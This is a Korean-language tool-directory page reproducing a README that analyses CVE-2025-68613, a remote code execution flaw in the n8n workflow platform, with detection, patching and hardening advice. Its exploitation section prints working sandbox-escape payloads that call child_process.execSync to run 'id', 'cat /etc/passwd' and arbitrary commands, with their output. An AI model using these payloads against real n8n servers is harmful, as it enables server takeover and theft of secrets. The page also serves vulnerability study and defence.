Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-68613-n8n-rce-analysis — CVE-2025-68613 (n8n) 심각한 RCE 분석 + 방어 권장 사항 (패치 검증, 탐지 아이디어 및 강화 팁) | Kitploit
도구/GitHubGitHub/ak-cybe/cve-2025-68613-n8n-rce-analysis
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationIncident Response
GitHubak-cybe/cve-2025-68613-n8n-rce-analysis

CVE-2025-68613-n8n-rce-analysis

CVE-2025-68613 (n8n) 심각한 RCE 분석 + 방어 권장 사항 (패치 검증, 탐지 아이디어 및 강화 팁)

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
17개월 전아직 검토되지 않음

헤더 배너

타이핑 SVG

심각도 CVSS 인스턴스 상태 CWE

해커 GIF 매트릭스 GIF


구분선

📑 목차

  • 🎯 요약
  • 🐛 취약점
  • 🔬 기술 분석
  • 💀 익스플로잇 단계별 설명
  • 💥 영향 평가
  • 🔍 탐지 및 대응
  • 🛡️ 완화 전략
  • 📚 참고 자료

🎯 요약

경고 GIF

CVE-2025-68613는 n8n 워크플로우 자동화 플랫폼의 치명적인 원격 코드 실행 취약점으로, 인증된 공격자가 표현식 삽입을 통해 임의 시스템 명령을 실행할 수 있게 합니다.


🐛 취약점

버그 GIF

📋 CVE 개요

🤖 n8n이란?

n8n은 오픈소스 워크플로우 자동화 플랫폼으로, 400개 이상의 애플리케이션에 걸쳐 노코드/로우코드 통합을 가능하게 합니다. 다양한 분야에서 널리 배포됩니다.

🏢 사용 사례📝 설명
🔧 DevOps

🔧 기술적 근본 원인

root@kitploit:~
🔓 취약점 체인:
┌─────────────────────────────────────────────────────────────────┐
│  📝 n8n 표현식 언어 → 동적 데이터 처리                         │
│                           ↓                                     │
│  ⚠️  서버측 평가에서 샌드박스 격리 불충분                      │
│                           ↓                                     │
│  💀 악의적 표현식이 샌드박스 이스케이프                        │
│                           ↓                                     │
│  🖥️  Node.js child_process 모듈 접근                           │
│                           ↓                                     │
│  💥 완전한 RCE - OS 명령 실행                                  │
└─────────────────────────────────────────────────────────────────┘

🔬 기술 분석

분석 GIF

🎯 공격 표면

악용을 위한 전제 조건:

#📋 요구 사항📝 세부 사항
1️⃣인증유효한 n8n 사용자 계정 (낮은 권한으로 충분)
2️⃣권한

⚔️ 공격 특징

🏷️ 속성📊 값🔥 위험
복잡도낮음 (AC:L)🔴 높음
사용자 상호작용필요 없음🔴 높음

🗺️ 취약점 흐름도

root@kitploit:~
graph TD
    A[🔐 인증된 사용자] -->|생성| B[📝 새 워크플로우]
    B -->|삽입| C[💀 악의적 표현식]
    C -->|트리거| D[⚡ 표현식 평가]
    D -->|악용| E[🔓 샌드박스 이스케이프]
    E -->|접근| F[🖥️ Node.js 런타임]
    F -->|실행| G[💥 OS 명령 via child_process]
    G -->|달성| H[☠️ 완전한 서버 장악]
    
    style A fill:#4CAF50,color:#fff
    style C fill:#ff9800,color:#fff
    style E fill:#f44336,color:#fff
    style H fill:#9c27b0,color:#fff

💀 익스플로잇 단계별 설명

해킹 GIF

⚠️ 면책 조항: 다음 내용은 교육 목적으로만 제공됩니다. 허가되지 않은 악용은 불법입니다.

📸 단계별 익스플로잇 스크린샷

🖥️ 1단계: n8n 인스턴스 접근

취약한 n8n 워크플로우 자동화 플랫폼에 초기 접근.

n8n 환영 화면
🔓 n8n 환영 대시보드 - 진입점


➕ 2단계: 새 워크플로우 생성

악성 페이로드를 포함할 새 워크플로우를 생성합니다.

새 워크플로우 생성
📝 "첫 단계 추가"로 새 워크플로우 생성


⚡ 3단계: 수동 트리거 추가

워크플로우 트리거 구성 - 수동 트리거는 요청 시 실행을 허용합니다.

수동 트리거 설정
🎯 워크플로우 활성화를 위한 수동 트리거 선택


📦 4단계: 설정 노드 추가

악성 표현식을 포함할 "Edit Fields (Set)" 노드를 추가합니다.

설정 노드 선택
🔧 페이로드 삽입을 위한 "Edit Fields (Set)" 노드 추가


💉 5단계: RCE 페이로드 삽입

중요 단계 - RCE를 달성하기 위해 샌드박스 이스케이프 표현식을 삽입합니다.

RCE 페이로드 실행
💀 악성 표현식이 'id' 명령을 성공적으로 실행!

root@kitploit:~
// 🔴 악성 페이로드 (불법적으로 사용하지 마세요)
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

출력 결과: uid=1000(node) gid=1000(node) groups=1000(node) ✅ RCE 확인!


💉 페이로드 예제

코드 인젝션 GIF

⚠️ 경고: 이 페이로드는 공인된 보안 테스트 용도로만 사용하세요. 허가되지 않은 사용은 불법입니다!

🔹 ID 명령 (사용자 정보)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

🔹 PWD 명령 (현재 디렉터리)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString(); })() }}

🔹 파일 읽기 (/etc/passwd)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat /etc/passwd').toString(); })() }}

🔹 사용자 정의 명령 템플릿

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('YOUR_COMMAND_HERE').toString(); })() }}

📸 파일 읽기 익스플로잇 PoC

passwd 파일 읽기 익스플로잇
💀 /etc/passwd 읽기 - 완전한 파일 시스템 접근 확인!


📤 예상 출력


🔍 근본 원인 분석

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────┐
│  🔴 취약점 근본 원인                                                    │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  n8n 표현식 평가기는 함수 표현식이 다음에 접근하는 것을 방지하는        │
│  검증기를 **누락**했습니다:                                               │
│                                                                         │
│    ❌ this.process        → Node.js 프로세스 객체                       │
│    ❌ mainModule.require  → 모듈 로딩 시스템                            │
│    ❌ child_process       → OS 명령 실행                                │
│                                                                         │
│  이로 인해 시스템 모듈에 직접 접근하고 임의 코드를 실행할 수 있습니다!  │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

💀 영향 요약

✅ 완화

업그레이드

root@kitploit:~
# 🛡️ n8n을 패치된 버전으로 업그레이드
npm install -g n8n@latest

# 또는 Docker 사용 시
docker pull n8n/n8n:1.122.0

🎬 공격 킬 체인

☠️ 사후 악용 능력


💥 영향 평가

폭발 GIF

🔺 CIA 3요소 분석

🌍 실제 노출 현황

취약


🔍 탐지 및 대응

탐정 GIF

🔎 탐지 전략

🛠️ 버전 감사 스크립트

root@kitploit:~
#!/usr/bin/env bash
# 🔍 CVE-2025-68613 n8n 버전 감사

echo "🔍 n8n 버전 확인 중..."

if command -v n8n >/dev/null 2>&1; then
    VER="$(n8n --version | tr -d 'v' | head -n1)"
    
    if [[ "$VER" < "1.120.4" ]] && [[ "$VER" >= "0.211.0" ]]; then
        echo "⚠️  취약: n8n $VER가 CVE-2025-68613에 영향을 받음"
        echo "📦 필요: 1.120.4, 1.121.1 또는 1.122.0+로 업그레이드"
        exit 2
    else
        echo "✅ 안전: n8n $VER는 패치됨"
    fi
else
    echo "❌ PATH에서 n8n을 찾을 수 없음"
fi

🚨 침해 대응 체크리스트

  • 🔌 격리 - 영향을 받은 n8n을 네트워크에서 분리
  • 💾 보존 - 로그 및 포렌식 증거 수집
  • 🔍 감사 - 모든 워크플로우에서 악성 표현식 검토
  • 🔄 교체 - 접근 가능한 모든 자격 증명 변경
  • 🔀 검토 - 측면 이동 징후 확인
  • 📦 패치 - 복구 전에 안전한 버전으로 업그레이드

🛡️ 완화 전략

방패 GIF

⚡ 즉시 조치 (우선순위 0)

🐳 컨테이너 강화 예제

root@kitploit:~
# 🛡️ 강화된 n8n 배포
FROM n8n/n8n:1.122.0

# 👤 루트가 아닌 사용자로 실행
USER node

# 🔒 다음 런타임 플래그 적용:
# --read-only --tmpfs /tmp:rw,noexec,nosuid
# --cap-drop=ALL --cap-add=NET_BIND_SERVICE
# --security-opt seccomp=n8n-seccomp.json

🔐 장기 보안

🛡️ 조치📝 구현
🌐 네트워크 분할n8n 인스턴스 격리
🔥 WAF 규칙표현식 패턴 모니터링
📜 감사 로깅포괄적인 로깅 활성화
🔍 보안 검토정기적인 워크플로우 평가

💬 블루팀을 위한 질문 🔵

생각 GIF

실행 전에 n8n 워크플로우 정의에서 표현식 삽입 시도를 식별하는 탐지 규칙을 어떻게 설계하시겠습니까? 합법적인 동적 표현식 사용과 보안 간의 균형을 고려해야 합니다.

보너스: 패치가 적용된 후에도 샌드박스 이스케이프가 발생할 경우 폭발 반경을 제한하기 위해 어떤 런타임 보호 조치를 구현하시겠습니까?


📚 참고 자료

책 GIF

📋 공식 권고

  • 🔗 NVD CVE-2025-68613 상세
  • 🔗 Snyk 권고

🔬 기술 분석

  • 📖 Orca Security: 치명적인 n8n RCE
  • 📖 Resecurity: 표현식 삽입 심층 분석
  • 📖 SecureLayer7: RCE 익스플로잇 가이드

🎮 실습 리소스

  • 🧪 TryHackMe: CVE-2025-68613 실습실
  • 💀 공개 PoC 스캐너

🏷️ 태그

root@kitploit:~
#CVE-2025-68613 #n8n #RCE #표현식-삽입 #워크플로우-자동화 
#샌드박스-이스케이프 #CWE-913 #치명적-취약점 #침투테스트 #블루팀

푸터

⚠️ 면책 조항: 이 분석은 교육 및 방어적 보안 목적으로만 제공됩니다.
허가되지 않은 취약점 악용은 불법입니다.

저자 업데이트

프로필 조회수

도구 다운로드

⚡ 빠른 통계

🔥 지표📊 값
CVSS 점수9.9 / 10
노출된 인스턴스103,476+
공격 복잡도낮음
인증 필요예 (낮은 권한)
사용자 상호작용없음

🎯 주요 사실

📌 속성📝 값
공개일2025년 12월 18일
벡터네트워크 (AV:N)
범위변경됨
영향CIA = 높음
공격 유형표현식 삽입
속성값
🆔 CVE IDCVE-2025-68613
📊 CVSS 점수9.9 (치명적) 🔴
🔗 CVSS 벡터CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
🏷️ CWECWE-913 (동적으로 관리되는 코드 리소스의 부적절한 제어)
📦 영향받는 버전0.211.0 → 1.120.3, 1.121.0
✅ 패치된 버전1.120.4, 1.121.1, 1.122.0+
자동화 파이프라인, CI/CD 통합
🛡️ 보안 운영SOAR 워크플로우, 침해 대응
💼 비즈니스프로세스 자동화, 데이터 워크플로우
📊 데이터ETL 프로세스, API 통합
워크플로우 생성/편집 기능
3️⃣네트워크 접근n8n 인스턴스에 도달 가능
범위변경됨🔴 치명적
🎯 페이로드📋 예상 출력
iduid=1000(node) gid=1000(node) groups=1000(node)
pwd/app
cat /etc/passwd전체 시스템 사용자 목록 (root, daemon, node 등)
env모든 환경 변수 (비밀 포함)
ls -la /루트 파일 시스템 목록
🎯 영향 유형📝 설명
💻 임의 명령 실행모든 OS 명령 실행 가능
📂 파일 시스템 접근모든 파일 읽기/쓰기
🔑 환경 변수 노출API 키, 비밀 유출
☠️ 완전한 시스템 장악전체 서버 탈취
🛡️ 심각도📊 등급
CVSS 점수9.9 / 10
공격 복잡도낮음
필요 권한낮음
사용자 상호작용없음
단계🔥 동작💀 영향
1️⃣초기 접근n8n에 인증
2️⃣실행악성 워크플로우 제출
3️⃣지속성리버스 셸/백도어 배포
4️⃣C2명령 및 제어 수립
5️⃣행동데이터 유출, 측면 이동
🎯 행동💥 영향 수준
🔑 자격 증명 탈취API 키, OAuth 토큰, DB 비밀번호 추출
📤 데이터 유출워크플로우 데이터, 실행 로그, 비즈니스 정보
🔒 지속성Cron 작업, 시작 스크립트, 웹 셸
🔀 측면 이동데이터베이스, CI/CD, 클라우드 인프라로 피벗
🗑️ 워크플로우 조작자동화 로직 수정/파괴

🔴 기밀성 (높음)

  • 🔑 API 키 노출
  • 🔐 OAuth 토큰 유출
  • 💾 DB 비밀번호 접근 가능
  • 📜 실행 로그 손상

🟠 무결성 (높음)

  • 📝 워크플로우 변경
  • ⚙️ 자동화 손상
  • 💉 악성 노드 삽입
  • 📊 데이터 조작

🟡 가용성 (높음)

  • ⏹️ 서비스 중단
  • 💀 리소스 고갈
  • 🔄 워크플로우 종료
  • 🖥️ 인프라 다운
#📋 방법🔍 모니터링 대상
📜로그 분석n8n 프로세스의 비정상 명령, 실패한 표현식
🌐네트워크알 수 없는 IP로의 아웃바운드 연결, 대용량 POST 요청
⚡런타임child_process 호출, 예상치 못한 spawn
📦버전 감사취약한 버전 범위 확인
🔢 우선순위
🛠️ 조치
📝 세부 사항
🔴 P0지금 패치1.120.4, 1.121.1 또는 1.122.0+로 업그레이드
🟠 P1접근 제한워크플로우 생성을 신뢰할 수 있는 사용자로 제한
🟡 P2컨테이너 강화보안 제한과 함께 배포
🔓 최소 권한접근 제어 적용